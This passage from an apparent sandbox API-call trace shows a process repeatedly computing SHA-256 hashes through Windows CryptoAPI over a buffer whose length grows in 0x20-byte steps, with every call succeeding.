	[0226.152] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.152] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.152] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.152] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0226.152] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231baf0
	[0226.152] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231baf0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231baf0, pdwDataLen=0x1284a8) returned 1
	[0226.152] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.152] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.153] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.153] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.153] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0226.153] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bb18
	[0226.153] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bb18, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bb18, pdwDataLen=0x1284a8) returned 1
	[0226.153] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.153] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.153] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.153] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.153] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0226.153] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bb40
	[0226.154] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bb40, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bb40, pdwDataLen=0x1284a8) returned 1
	[0226.154] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.154] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.154] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.154] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.154] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0226.154] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bb68
	[0226.154] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bb68, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bb68, pdwDataLen=0x1284a8) returned 1
	[0226.154] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.154] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.154] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.155] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.155] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0226.155] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bb90
	[0226.155] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bb90, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bb90, pdwDataLen=0x1284a8) returned 1
	[0226.155] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.155] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.155] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.155] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.155] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0226.155] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bbb8
	[0226.155] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bbb8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bbb8, pdwDataLen=0x1284a8) returned 1
	[0226.155] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.155] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.155] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.156] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.156] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0226.156] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bbe0
	[0226.156] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bbe0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bbe0, pdwDataLen=0x1284a8) returned 1
	[0226.156] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.156] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.156] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.156] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.156] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0226.156] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bc08
	[0226.156] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bc08, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bc08, pdwDataLen=0x1284a8) returned 1
	[0226.156] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.156] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.156] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.157] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.157] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0226.157] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bc30
	[0226.157] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bc30, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bc30, pdwDataLen=0x1284a8) returned 1
	[0226.157] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.157] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.157] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.157] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.157] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0226.157] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bc58
	[0226.157] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bc58, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bc58, pdwDataLen=0x1284a8) returned 1
	[0226.157] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.157] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.157] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.158] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.158] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0226.158] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bc80
	[0226.158] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bc80, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bc80, pdwDataLen=0x1284a8) returned 1
	[0226.158] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.158] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.158] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.158] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.158] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0226.158] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bca8
	[0226.158] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bca8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bca8, pdwDataLen=0x1284a8) returned 1
	[0226.158] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.158] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.158] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.159] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.159] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0226.159] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bcd0
	[0226.159] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bcd0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bcd0, pdwDataLen=0x1284a8) returned 1
	[0226.159] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.159] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.159] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.159] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.159] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0226.159] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.160] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bcf8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bcf8, pdwDataLen=0x1284a8) returned 1
	[0226.160] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.160] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.160] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.160] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.160] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0226.160] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.160] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bd20, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bd20, pdwDataLen=0x1284a8) returned 1
	[0226.160] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.160] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.160] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.161] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.161] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0226.161] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.161] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bd48, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bd48, pdwDataLen=0x1284a8) returned 1
	[0226.161] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.161] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.161] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.161] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.161] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0226.161] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.161] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bd70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bd70, pdwDataLen=0x1284a8) returned 1
	[0226.161] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.161] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.161] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.162] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.162] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0226.162] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.162] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bd98, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bd98, pdwDataLen=0x1284a8) returned 1
	[0226.162] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.162] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.162] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.162] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.162] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0226.163] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.163] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231bdc0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bdc0, pdwDataLen=0x1284a8) returned 1
	[0226.163] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.163] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.163] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.163] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.163] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0226.163] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.163] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bde8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bde8, pdwDataLen=0x1284a8) returned 1
	[0226.163] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.163] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.163] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.164] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.164] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0226.164] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.164] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231be10, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231be10, pdwDataLen=0x1284a8) returned 1
	[0226.164] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.164] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.164] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.164] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.164] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0226.164] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.164] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231be38, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231be38, pdwDataLen=0x1284a8) returned 1
	[0226.164] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.164] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.164] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.165] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.165] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0226.165] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.165] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231be60, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231be60, pdwDataLen=0x1284a8) returned 1
	[0226.165] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.165] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.165] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.165] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.165] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0226.165] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.165] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231be88, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231be88, pdwDataLen=0x1284a8) returned 1
	[0226.165] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.165] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.165] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.166] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.166] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0226.166] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.166] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231beb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231beb0, pdwDataLen=0x1284a8) returned 1
	[0226.166] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.166] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.166] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.166] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.166] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0226.166] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.167] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bed8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bed8, pdwDataLen=0x1284a8) returned 1
	[0226.167] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.167] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.167] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
